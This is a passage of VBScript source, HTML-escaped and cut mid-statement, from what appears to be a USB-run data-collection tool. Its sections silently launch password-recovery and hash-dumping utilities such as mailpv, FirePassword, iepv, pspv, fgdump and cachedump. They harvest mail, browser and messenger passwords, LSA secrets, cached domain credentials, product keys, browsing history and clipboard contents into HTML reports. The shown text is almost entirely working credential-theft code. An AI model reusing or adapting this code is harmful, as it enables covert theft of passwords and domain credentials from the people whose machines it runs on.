&amp; strDate &amp; "-" &amp; strTime &amp; "].html" &amp; "#cat_11"" target=""right""&gt;Mail Password&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objRightFile.WriteLine"&lt;p&gt;&lt;a name=""cat_11""&gt;&lt;/a&gt;&lt;font size=""3""&gt;&lt;b&gt;Mail Password&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objShell.Run "mailpv.exe /shtml " &amp; strtmpFile, 0, True If objFSO.FileExists(strtmpFile) Then Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING) strLine = objTextFile.ReadLine Do Until InStr(1,strLine,"&lt;body&gt;",1) Or objTextFile.AtEndOfStream strLine = objTextFile.ReadLine Loop Do Until objTextFile.AtEndOfStream strLine = objTextFile.Readline If InStr(1,strLine,"&lt;/body&gt;",1) =0 Then objRightFile.WriteLine strLine End If Loop objTextFile.Close Set objTextFile = Nothing objFSO.DeleteFile strtmpFile,True End If End if ' +----------------------------------+ ' + [Dump Firefox PW] + ' +----------------------------------+ If ReadINI("Firefox Password","Enable",strIniFile) Then objLeftFile.WriteLine"&lt;tr&gt;&lt;td&gt;&lt;b&gt;* &lt;a href=""" &amp; "right-[" &amp; strDate &amp; "-" &amp; strTime &amp; "].html" &amp; "#cat_12"" target=""right""&gt;Firefox Password(s)&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objRightFile.WriteLine"&lt;p&gt;&lt;a name=""cat_12""&gt;&lt;/a&gt;&lt;font size=""3""&gt;&lt;b&gt;Firefox Password&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objRightFile.WriteLine "&lt;table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""&gt;&lt;tbody&gt;&lt;tr&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Text Dump&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objShell.run "nircmd execmd FirePassword.exe &gt;" &amp; strFireFile,0 , True 'Nircmd is asynchronously we need to wait to ensure file written to WScript.Sleep CInt(Sleepms) If objFSO.FileExists(strFireFile) Then Set objTextFile = objFSO.OpenTextFile(strFireFile, FOR_READING) Do Until objTextFile.AtEndOfStream objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;" &amp; objTextFile.ReadLine &amp; "&lt;/td&gt;&lt;/tr&gt;" Loop 'End Table objTextFile.Close Set objTextFile = Nothing objFSO.DeleteFile strFireFile,True If Err &lt;&gt; 0 Then Err.Clear End If End if objRightFile.WriteLine "&lt;/tbody&gt;&lt;/table&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;" End if ' +----------------------------------+ ' + [Dump IE PW] + ' +----------------------------------+ If ReadINI("IE Password","Enable",strIniFile) Then objLeftFile.WriteLine"&lt;tr&gt;&lt;td&gt;&lt;b&gt;* &lt;a href=""" &amp; "right-[" &amp; strDate &amp; "-" &amp; strTime &amp; "].html" &amp; "#cat_13"" target=""right""&gt;IE Password(s)&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objRightFile.WriteLine"&lt;p&gt;&lt;a name=""cat_13""&gt;&lt;/a&gt;&lt;font size=""3""&gt;&lt;b&gt;IE Password&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objShell.Run "iepv.exe /shtml " &amp; strtmpFile, 0, True If objFSO.FileExists(strtmpFile) Then Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING) strLine = objTextFile.ReadLine Do Until InStr(1,strLine,"&lt;body&gt;",1) Or objTextFile.AtEndOfStream strLine = objTextFile.ReadLine Loop Do Until objTextFile.AtEndOfStream strLine = objTextFile.Readline If InStr(1,strLine,"&lt;/body&gt;",1) =0 Then objRightFile.WriteLine strLine End If Loop objTextFile.Close Set objTextFile = Nothing objFSO.DeleteFile strtmpFile,True End If End if ' +----------------------------------+ ' + [Dump messenger PW] + ' +----------------------------------+ If ReadINI("Messenger Password","Enable",strIniFile) Then objLeftFile.WriteLine"&lt;tr&gt;&lt;td&gt;&lt;b&gt;* &lt;a href=""" &amp; "right-[" &amp; strDate &amp; "-" &amp; strTime &amp; "].html" &amp; "#cat_14"" target=""right""&gt;Messenger Password(s)&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objRightFile.WriteLine"&lt;p&gt;&lt;a name=""cat_14""&gt;&lt;/a&gt;&lt;font size=""3""&gt;&lt;b&gt;Messenger Password&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objShell.Run "mspass.exe /shtml " &amp; strtmpFile, 0, True If objFSO.FileExists(strtmpFile) Then Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING) strLine = objTextFile.ReadLine Do Until InStr(1,strLine,"&lt;body&gt;",1) Or objTextFile.AtEndOfStream strLine = objTextFile.ReadLine Loop Do Until objTextFile.AtEndOfStream strLine = objTextFile.Readline If InStr(1,strLine,"&lt;/body&gt;",1) =0 Then objRightFile.WriteLine strLine End If Loop objTextFile.Close Set objTextFile = Nothing objFSO.DeleteFile strtmpFile,True End If End if ' +----------------------------------+ ' + [Dump Cache] + ' +----------------------------------+ If ReadINI("Cache","Enable",strIniFile) Then Set objWMIService = GetObject("winmgmts:\\.\root\CIMV2") Set colItems = objWMIService.ExecQuery("SELECT * FROM Win32_ComputerSystem") isDomain = False For Each objItem In colItems isDomain = objItem.PartOfDomain 'post-Windows 2000 only Next objLeftFile.WriteLine"&lt;tr&gt;&lt;td&gt;&lt;b&gt;* &lt;a href=""" &amp; "right-[" &amp; strDate &amp; "-" &amp; strTime &amp; "].html" &amp; "#cat_15"" target=""right""&gt;Cache&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objRightFile.WriteLine"&lt;p&gt;&lt;a name=""cat_15""&gt;&lt;/a&gt;&lt;font size=""3""&gt;&lt;b&gt;Cache Dump&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" If isDomain Then objRightFile.WriteLine "&lt;table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""&gt;&lt;tbody&gt;&lt;tr&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Results&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" 'Change Directory objShell.CurrentDirectory =strLogPath Set objWMIService = GetObject("winmgmts:" _ &amp; "{impersonationLevel=impersonate}!\\.\root\cimv2") If ReadINI("Cache","Method",strIniFile)=1 Then objShell.Run U3 &amp; "\fgdump.exe -w -k " , 0, True '// 5 Second Watchdog Timer // '// // Secs = Now() Set colProcessList = objWMIService.ExecQuery _ ("Select * from Win32_Process Where Name = 'fgdump.exe'") Do Until (DateDiff("s", Secs, Now()) &gt; 5) or colProcessList.Count = 0 Set colProcessList = objWMIService.ExecQuery _ ("Select * from Win32_Process Where Name = 'fgdump.exe'") Loop Else objShell.Run U3 &amp; "\cachedump.exe " , 0, True Secs = Now() Set colProcessList = objWMIService.ExecQuery _ ("Select * from Win32_Process Where Name = 'cachedump.exe'") Do Until (DateDiff("s", Secs, Now()) &gt; 5) or colProcessList.Count = 0 Set colProcessList = objWMIService.ExecQuery _ ("Select * from Win32_Process Where Name = 'cachedump.exe'") Loop End If If colProcessList.Count &lt;&gt; 0 Then 'kill process it shouldn't run this long For Each objProcess in colProcessList objProcess.Terminate() Next End If '\\ \\ '\\ End Watchdog Timer \\ ' If objFSO.FileExists("127.0.0.1.cachedump") Then Set objTextFile = objFSO.OpenTextFile("127.0.0.1.cachedump", FOR_READING) Do Until objTextFile.AtEndOfStream objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;" &amp; objTextFile.ReadLine &amp; "&lt;/td&gt;&lt;/tr&gt;" Loop objTextFile.Close Set objTextFile = Nothing End If 'End Table objRightFile.WriteLine "&lt;/tbody&gt;&lt;/table&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;" objShell.CurrentDirectory = U3 Else objRightFile.WriteLine "&lt;table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""&gt;&lt;tbody&gt;&lt;tr&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Result&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;td&gt;Not in a Domain&lt;/td&gt;" objRightFile.WriteLine "&lt;/tbody&gt;&lt;/table&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;" End If Set objWMIService = Nothing Set colItems = Nothing End if ' +----------------------------------+ ' + [Dump LSA secrets] + ' +----------------------------------+ If ReadINI("LSA Secrets","Enable",strIniFile) Then objLeftFile.WriteLine"&lt;tr&gt;&lt;td&gt;&lt;b&gt;* &lt;a href=""" &amp; "right-[" &amp; strDate &amp; "-" &amp; strTime &amp; "].html" &amp; "#cat_16"" target=""right""&gt;LSA Secrets&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objRightFile.WriteLine"&lt;p&gt;&lt;a name=""cat_16""&gt;&lt;/a&gt;&lt;font size=""3""&gt;&lt;b&gt;LSA Secrets&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objShell.Run "pspv.exe /shtml " &amp; strtmpFile, 0, True If objFSO.FileExists(strtmpFile) Then Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING) strLine = objTextFile.ReadLine Do Until InStr(1,strLine,"&lt;body&gt;",1) Or objTextFile.AtEndOfStream strLine = objTextFile.ReadLine Loop Do Until objTextFile.AtEndOfStream strLine = objTextFile.Readline If InStr(1,strLine,"&lt;/body&gt;",1) =0 Then objRightFile.WriteLine strLine End If Loop objTextFile.Close Set objTextFile = Nothing objFSO.DeleteFile strtmpFile,True End If End if ' +----------------------------------+ ' + [Dump Product Keys] + ' +----------------------------------+ If ReadINI("Product Keys","Enable",strIniFile) Then objLeftFile.WriteLine"&lt;tr&gt;&lt;td&gt;&lt;b&gt;* &lt;a href=""" &amp; "right-[" &amp; strDate &amp; "-" &amp; strTime &amp; "].html" &amp; "#cat_17"" target=""right""&gt;Product Keys&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objRightFile.WriteLine"&lt;p&gt;&lt;a name=""cat_17""&gt;&lt;/a&gt;&lt;font size=""3""&gt;&lt;b&gt;Product Keys&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objShell.Run "produkey.exe /nosavereg /shtml " &amp; strtmpFile &amp; " /remote " &amp; strComputerName, 0, True If objFSO.FileExists(strtmpFile) Then Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING) strLine = objTextFile.ReadLine Do Until InStr(1,strLine,"&lt;body&gt;",1) Or objTextFile.AtEndOfStream strLine = objTextFile.ReadLine Loop Do Until objTextFile.AtEndOfStream strLine = objTextFile.Readline If InStr(1,strLine,"&lt;/body&gt;",1) =0 Then objRightFile.WriteLine strLine End If Loop objTextFile.Close Set objTextFile = Nothing objFSO.DeleteFile strtmpFile,True End if End if ' +----------------------------------+ ' + [Dump URL History] + ' +----------------------------------+ If ReadINI("IE URL History","Enable",strIniFile) Then objLeftFile.WriteLine"&lt;tr&gt;&lt;td&gt;&lt;b&gt;* &lt;a href=""" &amp; "right-[" &amp; strDate &amp; "-" &amp; strTime &amp; "].html" &amp; "#cat_18"" target=""right""&gt;IE URL History&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objRightFile.WriteLine"&lt;p&gt;&lt;a name=""cat_18""&gt;&lt;/a&gt;&lt;font size=""3""&gt;&lt;b&gt;URL History&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" set sh = createobject("Shell.Application") Set history = sh.NameSpace(ssfHISTORY) for each item in history.items objRightFile.WriteLine "&lt;table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""&gt;&lt;tbody&gt;&lt;tr&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Item&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Details&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;" &amp; history.GetDetailsOf(item,-1) &amp; "&lt;/td&gt;&lt;/tr&gt;" If item.isFolder then set itFol = item.GetFolder for each item2 in itFol.items arry = split(itFol.GetDetailsOf(item2,-1),vbcrlf) objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;" &amp; arry(0) &amp; "&lt;/td&gt;" For i = 1 To UBound(arry) objRightFile.WriteLine "&lt;td&gt;&lt;a href=http://" &amp; arry(i) &amp; "&gt; " &amp; arry(i) &amp; "&lt;/a&gt;&lt;/td&gt;" Next objRightFile.WriteLine "&lt;/tr&gt;" Next end if 'End Table objRightFile.WriteLine "&lt;/tbody&gt;&lt;/table&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;" Next Set history = Nothing Set sh = Nothing End if ' +----------------------------------+ ' + [Dump Updates-List] + ' +----------------------------------+ If ReadINI("Windows Updates List","Enable",strIniFile) Then objLeftFile.WriteLine"&lt;tr&gt;&lt;td&gt;&lt;b&gt;* &lt;a href=""" &amp; "right-[" &amp; strDate &amp; "-" &amp; strTime &amp; "].html" &amp; "#cat_19"" target=""right""&gt;Updates List&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objRightFile.WriteLine"&lt;p&gt;&lt;a name=""cat_19""&gt;&lt;/a&gt;&lt;font size=""3""&gt;&lt;b&gt;Windows Updates&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objShell.Run "wul.exe /shtml " &amp; strtmpFile, 0, True If objFSO.FileExists(strtmpFile) Then Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING) strLine = objTextFile.ReadLine Do Until InStr(1,strLine,"&lt;body&gt;",1) Or objTextFile.AtEndOfStream strLine = objTextFile.ReadLine Loop Do Until objTextFile.AtEndOfStream strLine = objTextFile.Readline If InStr(1,strLine,"&lt;/body&gt;",1) =0 Then objRightFile.WriteLine strLine End If Loop objTextFile.Close Set objTextFile = Nothing objFSO.DeleteFile strtmpFile,True End if End if ' +----------------------------------+ ' + [Firewall] + ' +----------------------------------+ If ReadINI("Firewall Status","Enable",strIniFile) Then objLeftFile.WriteLine"&lt;tr&gt;&lt;td&gt;&lt;b&gt;* &lt;a href=""" &amp; "right-[" &amp; strDate &amp; "-" &amp; strTime &amp; "].html" &amp; "#cat_20"" target=""right""&gt;Firewall Status&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objRightFile.WriteLine"&lt;p&gt;&lt;a name=""cat_20""&gt;&lt;/a&gt;&lt;font size=""3""&gt;&lt;b&gt;Firewall Status&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" Set objFirewall = CreateObject("HNetCfg.FwMgr") Set objPolicy = objFirewall.LocalPolicy.CurrentProfile objRightFile.WriteLine "&lt;table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""2"" cellspacing=""0"" frame=""box"" rules=""all""&gt;&lt;tbody&gt;&lt;tr&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Profile Type&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Firewall Enabled&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Exceptions Not Allowed&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Notifications Disabled&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Unicast responses to multicast broadcast disabled&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;" &amp; objFirewall.CurrentProfileType &amp; "&lt;/td&gt;" If objPolicy.FirewallEnabled Then objRightFile.WriteLine "&lt;td bgcolor=""#00ff00""&gt;True&lt;/td&gt;" Else objRightFile.WriteLine "&lt;td bgcolor=""#ff0000""&gt;False&lt;/td&gt;" End If objRightFile.WriteLine "&lt;td&gt;" &amp; objPolicy.ExceptionsNotAllowed &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objPolicy.NotificationsDisabled &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objPolicy.UnicastResponsestoMulticastBroadcastDisabled &amp; "&lt;/td&gt;&lt;/tr&gt;" 'End Table objRightFile.WriteLine "&lt;/tbody&gt;&lt;/table&gt;&lt;/p&gt;" Set colPorts = objPolicy.GloballyOpenPorts objRightFile.WriteLine "&lt;table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""2"" cellspacing=""0"" frame=""box"" rules=""all""&gt;&lt;tbody&gt;&lt;tr&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Port Name&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Port Number&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;IP Version&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Protocol&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Scope&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Remote Addresses&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Enabled&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Built-in&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" For Each objPort in colPorts objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;" &amp; objPort.Name &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objPort.Port &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objPort.IPVersion &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objPort.Protocol &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objPort.Scope &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objPort.RemoteAddresses &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objPort.Enabled &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objPort.Builtin &amp; "&lt;/td&gt;&lt;/tr&gt;" Next 'End Table objRightFile.WriteLine "&lt;/tbody&gt;&lt;/table&gt;&lt;/p&gt;" Set colApplications = objPolicy.AuthorizedApplications objRightFile.WriteLine "&lt;table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""2"" cellspacing=""0"" frame=""box"" rules=""all""&gt;&lt;tbody&gt;&lt;tr&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Authorized Application&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Enabled&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;IP Version&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Process Image File Name&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Remote Addresses&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Scope&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" For Each objApplication in colApplications objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;" &amp; objApplication.Name &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objApplication.Enabled &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objApplication.IPVersion &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objApplication.ProcessImageFileName &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objApplication.RemoteAddresses &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objApplication.Scope &amp; "&lt;/td&gt;&lt;/tr&gt;" Next 'End Table objRightFile.WriteLine "&lt;/tbody&gt;&lt;/table&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;" Set objFireWall = Nothing Set ObjPolicy = Nothing Set colPorts = Nothing Set colApplications = Nothing End if ' +----------------------------------+ ' + [Port Scan] + ' +----------------------------------+ If ReadINI("Open Port Scan","Enable",strIniFile) Then objLeftFile.WriteLine"&lt;tr&gt;&lt;td&gt;&lt;b&gt;* &lt;a href=""" &amp; "right-[" &amp; strDate &amp; "-" &amp; strTime &amp; "].html" &amp; "#cat_21"" target=""right""&gt;Open Port Scan&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objRightFile.WriteLine"&lt;p&gt;&lt;a name=""cat_21""&gt;&lt;/a&gt;&lt;font size=""3""&gt;&lt;b&gt;Local Port Scan&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objShell.Run "portqry -local -l " &amp; strtmpFile, 0, True If objFSO.FileExists(strtmpFile) Then Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING) objRightFile.WriteLine "&lt;table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""&gt;&lt;tbody&gt;&lt;tr&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Results&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" Do Until objTextFile.AtEndOfStream strLine = objTextFile.Readline Select Case True Case Left(strLine,3) = "PID" 'End Previous Table objRightFile.WriteLine "&lt;/tbody&gt;&lt;/table&gt;" 'Start New Table objRightFile.WriteLine "&lt;table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""2"" cellspacing=""0"" frame=""box"" rules=""all""&gt;&lt;tbody&gt;&lt;tr&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;PID&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Port&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Local IP&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;State&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Remote IP: Port&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" Case IsNumeric(Left(strline,1)) And InStr(1,strLine, "mappings found")=0 strarry = Split(Replace(strLine,vbTab&amp;vbTab&amp;vbTab,vbTab&amp;vbTab),vbTab) sText = "" For i =0 To UBound(strarry) sText = sText &amp; "&lt;td&gt;" &amp; strarry(i) &amp; "&lt;/td&gt;" Next objRightFile.WriteLine "&lt;tr&gt;" &amp; sText &amp; "&lt;/tr&gt;" bPorts = True Case Else If bPorts = True Then objRightFile.WriteLine "&lt;/tbody&gt;&lt;/table&gt;" objRightFile.WriteLine "&lt;table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""&gt;&lt;tbody&gt;&lt;tr&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Results&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" bPorts = False End If objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;" &amp; strLine &amp; "&lt;/td&gt;&lt;/tr&gt;" End Select Loop objTextFile.Close Set objTextFile = Nothing objFSO.DeleteFile strtmpFile,True End if 'End Table objRightFile.WriteLine "&lt;/tbody&gt;&lt;/table&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;" End if ' +-----------------------------------+ ' + Clipboard + ' +-----------------------------------+ If ReadINI("Clipboard","Enable",strIniFile) Then objLeftFile.WriteLine"&lt;tr&gt;&lt;td&gt;&lt;b&gt;* &lt;a href=""" &amp; "right-[" &amp; strDate &amp; "-" &amp; strTime &amp; "].html" &amp; "#cat_22"" target=""right""&gt;Clipboard Contents&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objRightFile.WriteLine"&lt;p&gt;&lt;a name=""cat_22""&gt;&lt;/a&gt;&lt;font size=""3""&gt;&lt;b&gt;Clipboard Contents&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objRightFile.WriteLine "&lt;table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""&gt;&lt;tbody&gt;&lt;tr&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Contents&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;pre&gt;" objShell.Run "nircmd.exe clipboard addfile " &amp; strtmpFile, 0, True If objFSO.FileExists(strtmpFile) Then Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING) Do Until objTextFile.AtEndOfStream objRightFile.WriteLine objTextFile.ReadLine Loop 'End Table objTextFile.Close Set objTextFile = Nothing objFSO.DeleteFile strtmpFile,True If Err &lt;&gt; 0 Then Err.Clear End If End if objRightFile.WriteLine "&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;" 'End Table objRightFile.WriteLine "&lt;/tbody&gt;&lt;/table&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;" 'WScript.Sleep 1000 End if ' +-----------------------------------+ ' + Win Audit + ' +-----------------------------------+ If ReadINI("Win Audit","Enable",strIniFile) Then objLeftFile.WriteLine"&lt;tr&gt;&lt;td&gt;&lt;b&gt;* &lt;a href=""" &amp; "right-[" &amp; strDate &amp; "-" &amp; strTime &amp; "].html" &amp; "#cat_23"" target=""right""&gt;WinAudit&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objRightFile.WriteLine"&lt;p&gt;&lt;a name=""cat_23""&gt;&lt;/a&gt;&lt;font size=""3""&gt;&lt;b&gt;Parmavex WinAudit&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objRightFile.WriteLine "&lt;table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""&gt;&lt;tbody&gt;&lt;tr&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Status&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" cmdline = ReadINI("Win Audit","cmdline",strIniFile) objShell.Run "WinAudit.exe " &amp; cmdline &amp; _ " /f=" &amp; strLogPath &amp; "\" &amp; "WinAudit-[" &amp; strDate &amp; "-" &amp; strTime &amp; "]" &amp; _ " /l=" &amp; strLogPath &amp; "\WinAudit.log", 0, True objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;"&amp; "WinAudit.exe " &amp; cmdline &amp; _ " /f=" &amp; strLogPath &amp; "\" &amp; "WinAudit-[" &amp; strDate &amp; "-" &amp; strTime &amp; "]" &amp; _ " /l=" &amp; strLogPath &amp; 